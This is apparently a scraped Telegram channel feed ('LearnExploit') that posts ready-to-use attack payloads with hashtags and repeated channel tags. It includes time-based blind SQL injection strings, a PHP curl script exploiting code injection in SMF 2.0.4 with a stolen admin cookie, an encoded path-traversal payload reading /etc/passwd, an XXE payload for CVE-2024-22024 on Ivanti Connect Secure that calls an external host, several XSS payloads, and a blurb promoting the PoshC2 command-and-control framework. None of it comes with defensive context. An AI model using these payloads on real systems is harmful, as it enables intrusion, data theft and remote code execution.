Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
SMF 2.0.4 admin payload code execution
⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.
⚪️ payload code must escape from \', so you should try with something like that:
⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
⚪️ For character_set - another story, as far as I remember, because here we have
⚪️ a nice stored xss. ;)
⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:
Code:
#Execution #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
exploited by php injection.
Code:
<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
#Execution #XSS #Payload
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Blind SQL Injection payload
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
LFI Payload⚡️
Payload:
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
XSS of the day : DOM-XSS-SiteMinder
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.
LearnExploit
#Payload #C2 #Proxy #Aware
Please open Telegram to view this post
VIEW IN TELEGRAM
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army